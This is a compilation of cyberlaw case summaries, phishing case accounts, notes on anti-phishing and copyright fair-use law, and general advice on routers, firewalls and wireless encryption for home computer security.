Sandals Resorts Intern. Ltd. v. Google, Inc.

Some unknown person sent an email to a number of undisclosed recipients containing information that was critical of the hiring and other business practices of the Caribbean resort Sandals. Irritated by this communication, Sandals filed an action in New York state court seeking a subpoena to compel Google to identify the owner of the offending Gmail account.

The trial court denied the petition seeking discovery. Sandals sought review with the appellate court. On appeal, the court affirmed the denial of the petition for discovery.

Under New York law, a person or entity can learn the identity of an unknown possible defendant only when it demonstrates that it has “a meritorious cause of action and that the information sought is material and necessary to the actionable wrong.” In this case, the court held that the petition failed to demonstrate that Sandals had a meritorious cause of action.

The court found that nothing in the petition identified specific assertions of fact as false. It also found that the lower court did not err in reasoning that the failure to allege the nature of the injuries caused by the statements in the email were fatal to the petition.

It went on to find that even if the petition had sufficiently alleged the email injured Sandals’ business reputation or damaged its credit standing, it would still deny the application for disclosure of the account holder’s identification on the ground that the subject email was constitutionally protected opinion.

Simonoff v. Expedia, Inc.

Plaintiff sued Expedia under the Fair and Accurate Credit Transactions Act (“FACTA”). He was upset that the electronic receipt Expedia emailed him contained the expiration date of his credit card.

The district court dismissed plaintiff’s case and he sought review with the Ninth Circuit. On appeal, the court affirmed that the electronic receipt did not violate FACTA.

FACTA provides that “no person that accepts credit cards or debit cards for the transaction of business shall print more than the last 5 digits of the card number or the expiration date upon any receipt provided to the cardholder at the point of the sale or transaction.”

The restriction applies only to “receipts that are electronically printed.” The court found that the electronic receipt did not fall into this scope. It looked to the general notion of what it means for something to be “printed”:

• “Print” refers to many different technologies—from Mesopotamian cuneiform writing on clay cylinders to the Gutenberg press in the fifteenth century, Xerography in the early twentieth century, and modern digital printing—but all of those technologies involve the making of a tangible impression on paper or other tangible medium.
  

Users v. Facebook new Privacy Litigation

Plaintiff Facebook users sued defendant Facebook for violation of California’s Unfair Competition Law (“UCL”), Cal. Bus. & Prof. Code17200, et seq., alleging that Facebook intentionally and knowingly transmitted personal information about plaintiffs to third-party advertisers without plaintiffs’ consent.  Facebook moved to dismiss the UCL claim.  The court granted the motion.

Defendant argued that plaintiffs failed to state a claim because they lacked standing under the UCL, since they did not allege they lost money or property.  Defendant asserted there was no such loss because plaintiffs’ “personal information” did not constitute property under the UCL.

Instead, the plaintiffs had alleged that defendant unlawfully shared their “personally identifiable information” with third-party advertisers.  However, the court distinguished the plaintiffs’ claim from Doe 1 v. AOL, LLC, 719 F.Supp.2d 1102 (N.D. Cal. 2010).  In that case, the plaintiffs’ personal and financial information had been distributed to the public after the plaintiffs therein signed up and paid fees for AOL’s service.  The court dismissed plaintiff’s claim in this case under the holding of Doe v. AOL — since plaintiffs alleged they received defendant’s services for free, they could not state a UCL claim.

Hubbard v. MySpace

Plaintiff, who sued on behalf himself and others similarly situated, claimed that MySpace improperly turned over account information and private messages to law enforcement, even though there was a search warrant. Plaintiff claimed this violated the Stored Communications Act, 18 USC 2701 et seq. MySpace moved to dismiss. The court granted the motion.

The version of the Stored Communications Act in effect at the time of the alleged wrongful disclosure in this case provided that a search warrant seeking the information must issue from a federal court “with jurisdiction over the offense under investigation,” or be “an equivalent State warrant.”

Plaintiff argued that the warrant sent to MySpace was not sufficient under the SCA (and should have been ignored) because (1) the state magistrate did not have jurisdiction to hear the felony that the cops were investigating plaintiff for, and (2) the magistrate did not have the power to issue search warrants across state lines.

The court rejected both of these arguments. In determining the warrant to be “an equivalent State warrant,” it looked to the way federal magistrates issue warrants in SCA cases. It held that the phrase “jurisdiction over the offense under investigation” refers to the power to issue warrants, not to the power to ultimately try the case. And the court looked to the legislative history around the Patriot Act amendments to conclude that SCA investigations give magistrate judges special powers to direct search warrants across state lines, because having to require cooperation with the courts in which an ISP actually exists might allow enough time for a terrorist to get away or strike again.

Frees, Inc. v. Phil McMillian

Former Employees Use Data Obtained From Plaintiff’s Computers To Aid Competitor

Defendants McMillian and Pierceall were former employees of plaintiff Frees Inc., a company that manufactures and markets ventilation and dust control systems.  Both defendants went to work for Southeast, a competitor of plaintiff.  The complaint alleged that defendants improperly obtained proprietary data from plaintiff’s computer systems, which they used to assist Southeast in competing with Frees.  Defendant McMillian was also alleged to have deleted data from Frees’ computers before he left its employ.  As a result, plaintiff expended over $16,000 to engage computer consultants to  conduct a forensic investigation of its computers, and the harm McMillian may have caused.  Frees did not suffer any interruption of service as a result of defendants’ alleged misconduct.

Plaintiff commenced this suit, asserting claims under the Computer Fraud and Abuse Act, 18 U.S.C. section 1030.  Plaintiff sought to recover both the funds expended in retaining the computer consultants, as well as the revenues it lost as a result of  defendants’ use of its proprietary data.

Randall David Fischer v. Mt. Olive Lutheran Church, et al.

Court allows plaintiff to proceed with claims advanced against his employer and various fellow employees under the Electronic Communications Privacy Act, the Electronic Communications Storage Act, and Wisconsin's right to privacy statute, Wis. Stat. Section 895.50, as well as a common law defamation claim, arising out of defendants' interception of a telephone call plaintiff placed from his place of employ, and defendants' review of e-mails contained in a personal e-mail account plaintiff maintained with Hot Mail, which account plaintiff accessed from his work place.  There were sharply differing versions of the content of these various communications.  Defendants alleged that during the telephone call, the participants, while masturbating, graphically described homosexual activity between two males.  Plaintiff denied this.  Defendants also alleged that e-mails read from plaintiff's email account evidenced that plaintiff was involved in homosexual activity.  Plaintiff denied that these e-mails had been sent to him.

Defendants' version of the telephone conversation was related to various third parties, which resulted in the termination of plaintiff's employment.  This lawsuit ensued.  The court determined that plaintiff should be permitted to proceed with various claims he asserted.

The court refused to dismiss plaintiff's claim, advanced under Wisconsin's right of privacy law, section 895.50, arising out of the review of e-mail from plaintiff's personal Hot Mail account.  The court held that issues of fact existed as to whether the review of such e-mail would be highly offensive to a reasonable person, and as to whether a reasonable person could consider such an account to be private, which precluded a grant of summary judgment to defendants.  The court also refused to dismiss the claim plaintiff brought under the Electronic Communications Storage Act arising out of the review of these e-mails.  If such a review took place (as opposed to defendants' having fabricated the e-mails) it would run afoul of the Stored Communications Act.  The court did dismiss the claims plaintiff raised under the Computer Fraud and Abuse Act, holding that plaintiff had not alleged economic damages arising from the review of these e-mails sufficient to state a claim under the Act.

The court also refused to dismiss the claims plaintiff advanced under the Electronic Communications Privacy Act and Wisconsin Privacy Act arising out of the interception of the telephone call described above.  The court refused to dismiss plaintiff's ECPA claim because, depending on what actually occurred, the defendants should have stopped listening to the telephone call when they discovered it was personal in nature.  The court refused to dismiss plaintiff's privacy act claims because plaintiff may have had a reasonable expectation of privacy in the telephone call if his claim that he made the call from a place his employer designated for private personal calls was true.

Lastly, the court refused to dismiss plaintiff's defamation claim, finding that issues of fact precluded it from determining whether defendants' communication of their version of the telephone call to third parties was protected by the common interest privilege possessed by members of religious associations as to communications pertaining to the qualifications of those who work for the organization.  Such privilege may have been lost, given plaintiff's claim that the defendants were lying about what took place during the telephone call.

A.V., et al. v. IParadigms, Limited Liability Company

Court holds that minors entered into valid ‘click wrap’ agreement with defendant IParadigms LLC (“IParadigms”) by clicking an “I agree” icon which appeared directly below an online Usage Agreement, and indicated their assent to be bound thereby.  Plaintiffs were high school students that were directed by the schools they attended to submit class work to defendant IParadigm’s “Turnitin” website to check for plagiarism.  As part of this submission process, plaintiffs were obligated to assent to the site’s Usage Agreement.  Because the Usage Agreement contained a limitation of liability clause precluding liability to plaintiffs as a result of their use of the Turnitin site, the Court rejected plaintiffs’ copyright infringement claims, which arose out of defendant’s storage of plaintiffs’ class work in a database used to check student homework for plagiarism.

In reaching this result, the Court rejected plaintiffs’ claims that, as minors, they were not bound by the terms of the site’s Usage Agreement.  Because they had accepted the benefits of the agreement – the ability to submit their class work for grade to their respective schools was dependent upon their use of the site – they could not escape the contractual conditions upon which such benefits were rendered.

The Court further held that plaintiffs’ copyright infringement claims failed because defendant had made a permissible fair use of their works.  In reaching this result, the Court relied on the fact that Turnitin’s use of plaintiffs’ school work was highly transformative of the original works, in that it added plaintiffs’ school work to a non-publicly available database used only to check for plagiarism by students.  The Court also rested its holding of fair use on the fact that defendant’s use did not impact the market for plaintiffs’ works, as the copies Turnitin made thereof were not available to the public, but rather maintained in a non-public database.

The Court rejected the counterclaims advanced by defendant iParadigms, including a claim for indemnification as a result of the commencement of this action.  This claim was based on a separate “Usage Policy” found on the Turnitin site.  The Court held that plaintiffs were not bound by this policy, which was not linked or otherwise referenced in the Usage Agreement to which plaintiffs were in fact bound.  There was no evidence that plaintiffs were aware of this separate “usage policy,” which was contained in a link on each page of the Turnitin site.  As a result, and because the parties’ contract stated that it constituted the full agreement between the parties, the plaintiffs’ use of the site was held not to create a valid browse wrap agreement, and the claim for indemnification, predicated on the Usage Policy, was dismissed.

Deloitte & Touche LLP v. Carlson

Defendant had risen to the level of Director of a large consulting and professional services firm. (There is some irony here – this case involves the destruction of electronic data, and defendant had been in charge of the firm’s security and privacy practice.)

After defendant left the firm to join a competitor, he returned his work-issued laptop with the old hard drive having been replaced by a new blank one. Defendant had destroyed the old hard drive because it had personal data on it such as tax returns and account information.

The firm sued, putting forth a number of claims, including violation of the Computer Fraud and Abuse Act (CFAA). Defendant moved to dismiss for failure to state a claim upon which relief can be granted. The court denied the motion.

Defendant argued that the CFAA claim should fail because plaintiff had not adequately pled that the destruction of the hard drive was done “without authorization.” The court rejected this argument.

The court looked to Int’l Airport Centers LLC v. Citrin, 440 F.3d 418 (7th Cir. 2006) for guidance on the question of whether defendant’s alleged conduct was “without authorization.” Int’l Airport Centers held that an employee acts without authorization as contemplated under the CFAA if he or she breaches a duty of loyalty to the employer prior to the alleged data destruction.

Reichert v. Elizabethtown College

Plaintiff’s threatening behavior toward certain faculty members of his college led the administration to monitor plaintiff’s school-issued email account. Plaintiff’s lawsuit against the school included claims for violation of the Electronic Communications Privacy Act (ECPA), the Stored Communications Act (SCA), and common law invasion of privacy. The college moved to dismiss these claims and the court granted the motion.
The court found that the ECPA claim failed because plaintiff did not allege the interception of the email messages was contemporaneous with the messages’ transmission. As for the SCA claim, the court noted that the statute protects electronic communications providers from liability for searches of their own systems which are used to provide the service. 

Payday Advance Plus, Inc. v. Findwhat.com, Inc., and Advertising.com, Inc.

Court allows plaintiff to proceed with ‘click-fraud’ claim against defendant Findwhat.com, a search engine operator.  The complaint alleged that to increase its revenues from pay-per-click advertisements posted on its site by plaintiff, defendant Findwhat.com directed defendant Advertising.com to engage ‘bots’ and individuals to click on plaintiff’s advertisements.  This had the effect of increasing defendant Findwhat.com’s revenues, as plaintiff paid it on a pay-per-click basis.  The complaint alleged that defendant Findwhat also bid on pay-per-click search terms, thereby improperly increasing the price plaintiff had to bid therefore to obtain higher placement for such terms.  The Court held that such misconduct could run afoul of the implied covenant of good faith and fair dealing in the parties’ contract, and accordingly allowed plaintiff to proceed with a breach of contract claim against defendant Findwhat.com. Findwhat.com changed its name to Miva, Inc. in June 2005.

The Court did dismiss the balance of the claims plaintiff asserted.  Its unjust enrichment claims failed because there was a valid contract governing the subject matter of plaintiff’s claim.  Plaintiff’s negligence claims failed because of the absence of any independent duty on the part of defendant Findwhat.com to monitor the source of the ‘clicks’ plaintiff received.  Such an obligation would be governed by the terms of the parties’ contract. 

Finally, plaintiff’s fraudulent concealment claim failed because of plaintiff’s failure to plead such claim with the requisite particularity.  Plaintiff was granted leave to replead this claim, premised on defendant Findwhat.com’s alleged duty to disclose that it was improperly causing a third party to click on plaintiff’s ads so as to increase Findwhat.com’s revenues.  Such a claim, if properly alleged, would serve to support a civil conspiracy claim against defendant Advertising.com, which was the party that allegedly arranged to have a ‘bot’ click on plaintiff’s ads.

Kenneth Aitken v. Communications Workers of America

Court denied motion to dismiss complaint charging the defendant Union and two of its organizers with violating the CAN-SPAM Act by sending email solicitations promoting union membership to Verizon employees which purported to come from Verizon managers who did not authorize their transmission.  The Virginia District Court held that it could exercise personal jurisdiction over the non-resident Union organizers because both the corporate servers used to transmit these emails, as well as some of the employees who received them, were located in Virginia.
The Court further held that plaintiff Verizon had stated valid CAN-SPAM claims against the defendants.  In reaching this result, the Court rejected defendants’ contentions that their solicitations constituted non-commercial speech promoting union membership exempt from the strictures of CAN-SPAM.  Because the Union rendered a service – representation of employees – for a fee – union dues – the emails constituted commercial speech.  As such, held the Court, the failure of these emails to accurately describe their source, or to appropriately advise that they were, in fact, advertisements, as well as their failure to provide mandated opt-out instructions, rendered their senders potentially liable for violations of CAN-SPAM.

Zango and kaspersky case

Zango, an online media company, came up short in its attempt to force an anti-virus company to reclassify its "spyware" tag for the company's adware.

The U.S. District Court for the Western District of Washington ruled in favor of Kaspersky Lab, granting the security company immunity from liability in a suit filed by Zango. According to Kaspersky, Zango sued them to force the company to reclassify Zango's programs as "non-threatening" and to prevent Kaspersky's security software from blocking Zango's programs. 

"Kaspersky Lab's mission is, and has always been, to make the Internet a safer place for all," said Steve Orenberg, president of Kaspersky Lab, USA, in a statement. "We are thrilled with the outcome of this case because it supports the key message of the information security industry -- consumer protection comes first."

The judge threw out Zango's lawsuit on the grounds that Kaspersky was immune from liability under the Communications Decency Act, part of which states that a provider or user of an interactive computer service shall not be held liable on account of any action voluntarily taken in good faith to restrict access to material that the provider or user considers to be "obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable."

Kaspersky noted that the ruling protects the consumer's right to determine what information and software is allowed on their computer, and gives anti-malware vendors the right to identify and label software programs that may be potentially unwanted and harmful to a user's computer as they see fit.

India phishing case

One financial Institute registered a crime stating  that some persons (“perpetrators”) have perpetrated certain acts through misleading emails ostensibly emanating from ICICI Bank’s email ID. Such acts have been perpetrated with an intent to defraud the Customers.
The Investigation was carried out with help of those emails received by the customers of that financial Institute and arrested the accused , the place of offence at Vijaywada  was searched for the evidence . There one Lap Top and Mobile Phone was seized which was used for the commission of the crime
The arrested accused had used open source code email application software for sending spam emails. He has down loaded the same software from net and then used it as it is.
He used only VSNL emails to spam the email to customers of financial Institute because VSNL email service provider do not have spam box to block the unsolicited emails.
After spamming emails to financial Institute customers he got the response from around 120 customers of which 80 are genuine and others are not correct because it do not have debit card details as required for e-banking.
The financial Institute customers those who have received his email felt that the email was originated from the financial Institute bank. When they filled the confidential information and submitted that time said information was directed to accused. This was possible because the dynamic link was given in the first page (Home page) of the fake web site. The dynamic link means when people click on the link provided in spamming email that time only the link will be activated. The dynamic link was coded by handling the Internet Explorer onclick() event and the information of the form  will be submitted to the web server (Where the fake web site is hosted). Then server will send he data to configured email address and in this case email configured was to the accused email .  So on submission of the confidential information the information was directed to email ID accused email .The all the information after fishing (user name, password, Transaction password, Debit card Number and PIN, mothers maiden name) which he had received through Wi-Fi internet connectivity of Reliance.com which was available on his Acer Lap Top.

Egypt and US. phishing case

The US and Egyptian fraudsters were accused of using phishing scams to steal account details from hundreds, possibly thousands, of people, and transferring about $1.5 million into fake accounts they controlled.

The group of fraudsters were accused of targeting US financial institutions and victimising a number of account holders by fraudulently using their personal financial information after they were successfully phished.

The arrests were the result of an investigation called ‘Operation Phish Phry’. Starting in 2007, FBI agents worked with US financial institutions to “identify and disrupt” criminal phishing gangs.

“This international phishing ring had a significant impact on two banks and caused huge headaches for hundreds, perhaps thousands of bank customers,” said Acting US Attorney George S. Cardona, in a statement.

“Organised, international crime rings can only be confronted by an organised response by law enforcement across international borders, which we have seen in this case.”

Phishing and laws

Definition of Phishing

According to Merriam-Webster, “phishing” is “a scam by which an email user is duped into revealing personal or confidential information which the scammer can use illicitly.”

Wikipedia states “in the field of computer security phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in electronic communication.”

Federal Laws

CAN-SPAM (Controlling the Assault of Non-Solicited Pornography And Marketing) Act of 2003

·         Signed into law by George W. Bush

·         Sets standards for sending commercial email

·         It is a misdemeanor to send spam with falsified header information!

Anti-Phishing Act of 2004(never got past committee)

•        Introduced by Senator Patrick Leahy

Anti-Phishing Act of 2005(never enacted)

•         This law, had it passed, would have placed large fines and lengthy prison sentences for “fake websites and bogus websites” developed for the purpose of defrauding individuals

•        First law to differentiate and target “phishing” specifically

Six Exclusive Rights of the Copyright Holder

(1) To reproduce the copyrighted work in copies or phonorecords; 

(2) To prepare derivative works based upon the copyrighted work; 

(3) To distribute copies or phonorecords of the copyrighted work to the public by sale or other transfer of ownership, or by rental, lease, or lending; 

(4) In the case of literary, musical, and other audiovisual works, to perform the copyrighted work publicly; 

(5) In the case of literary, musical, etc., to display the copyrighted work publicly; and 

(6) In the case of sound recordings, to perform the copyrighted work publicly by means of a digital audio transmission.

Online Materials and Copyright

The copyright holder has the same rights regardless of the format of the work (e.g., online, Web-based, CD-ROM)

The right to copy the work remains with the owner; this includes a copy to your computer.

If you make a copy for your personal use, it is likely to be regarded as fair use.  If you post it to a public Web site, it is unlikely to be considered fair use.

Guidelines for Using Online Materials

Check if the copyright holder provides information on how his/her document or computer program may be used.

If possible, get permission from the copyright holder and keep a record of the permission granted.

If you intend to use something repeatedly, get permission.

How to Judge Fair Use

1- Purpose and character of the use.

• Commercial vs. non-profit educational purposes.

2- Nature of the copyrighted work.
3- The amount of the work used.
4- The effect of the use on the market potential of the work.

NOTE:  all four factors are weighed, no one factor ensures fair use.

Fair Use Copying Guidelines for Instructors:

Single copies:

• A chapter from a book (not the entire book).

• An article from a periodical or newspaper.

• A short story, essay, or poem whether from an anthology or not.

• A chart, graph, diagram, drawing, cartoon, or picture from a book, periodical, or newspaper.

Good Reasons for Fair Use

You are making a productive use of someone else’s creativity in which the other person’s creativity is an indispensable component:

• Example 1:  Literary criticism.  You must quote an author’s work in order to critique it.

• Example 2:  Parody.  You must use some elements of an author’s work in order to satirize it.

You are engaged in one of the public interest activities that Congress has explicitly recognized:

• Criticism, Comment
• News reporting
• Teaching, scholarship, or research

What you are doing has no commercial impact on the author, not even a lost opportunity

Securing Your PC and Data

Communications

A large part of security clearly involves developing a sense of the inbound and outbound communications that your computer is engaged in. Malware is often used to acquire information, computing resources, and so on for untoward purposes. Each of those objectives requires establishing communication with the outside world.

It's been noted in many places, but will be repeated here for emphasis, if you are dealing with the control of unwanted/undesired communications your machine is already compromised. You are not eliminating the compromise by controlling the communications; you are mitigating the range of consequences. That is a very beneficial end result, but the scope of the result needs to be fully appreciated. Control of communications provides containment, not necessarily remedy, of malware.

There are a number of specific approaches that can be used to monitor and control communications. One detail to keep in mind - if control is exerted off the computer, you are dealing with packets/ports/destinations/and perhaps glimpses of information. Control exerted from on the computer is able to exercise a much higher level knowledge regarding the communication. For example, the specific application participating in the communication will be known. 

With regards to specific approaches:

Router: A router is not a security device, but its functional behavior has clear security implications. In very basic terms, a router will automatically reject unsolicited inbound communications to your PC. It will not reject solicited, but malicious, communications. The benefits and robustness of the operational hardware firewalling provided by a router are covered well in discussions such as El Cheapo Router Challenge and First winner - El Cheapo Router Challenge. Every home broadband user should employ a router. An excellent site to visit for coverage of router (and other) hardware is SmallNetBuilder.com. In particular, visit the Wireless Performance Charts section if you're actively shopping for a device.

Software firewall (client): For the majority of average users, use of the Windows based firewall or the firewall component of a security suite is generally more than enough. Specialized/dedicated firewalls generally afford much more latitude with respect to the granularity with which communications can be managed and controlled via the development of detailed rules by application, port, or protocol, among other possible variables. The primary difference between the communication control provided by a router and a full featured firewall is as follows:

• A router is a separate dedicated hardware device. The computational load associated with it has no impact on PC resource load. It is therefore effectively a means of resource load balancing

• A router deals with packets and packets only. It has no direct knowledge of the application generating the communications. Rules to control communications will therefore tend to be time (day/hour/net amount) and protocol (tcp/ip arp, by port number, etc.) based.

• If you really wish to actively control communications between your PC and the outside world, a software firewall is a must.

Hybrid solutions: Instead of a dedicated hardware router, if you’re in possession of an older PC, this can be converted into a somewhat more powerful and flexible router solution using readily available packages such as Smoothwall, m0n0wall, pfsense, IPCop, or Endian. These and related products can be used to turn legacy hardware into flexible firewall/routing solutions. 

Wireless communications: With the increasing prevalence of laptops, netbooks, and other small devices enabled with wireless communication, the management of wireless access is a factor that needs to be addressed at some point. Although Bruce Schneier has written about My Open Wireless Network (see also Terrorists Using Open Wireless Networks as counterpoint by Schneier as well), the simple fact of the matter is that personal wireless networks should be closed access with a decent level of encryption enabled. As a base level of security, the ability to remotely administer a wireless router should be disabled as a matter of course (this is the typical default) and WPA2 encryption should be employed. For the generation of various keys required for encryption, a number of convenient sources are available on-line ( SpeedGuide.net WLAN Key Generator or WEP/WPA key Generator from Soroban Systems are representative examples). 

Are any of these solutions needed?

• At the very least, any home with computers on the internet should employ a consumer level router. They are cheap, effective, remove computational load from the user’s PC, and are robust.

• If wireless connections are used in the home, the link should be encrypted with WPA2 level encryption.

• If the user feels that active control of communications on a process/application basis is required (and this could be as simple as denying internet access to all but a select set of applications on a per application basis), then a software firewall should be used. Note, this is the level of security at which user intervention has significantly increased. The prior two items are generally rapidly implemented and left to function. The step to implementing a coherent software firewall is much larger in most instances.

• If spare general purpose PC’s are available and unused, tasking one as a dedicated router/firewall may be beneficial from both security and educational perspectives.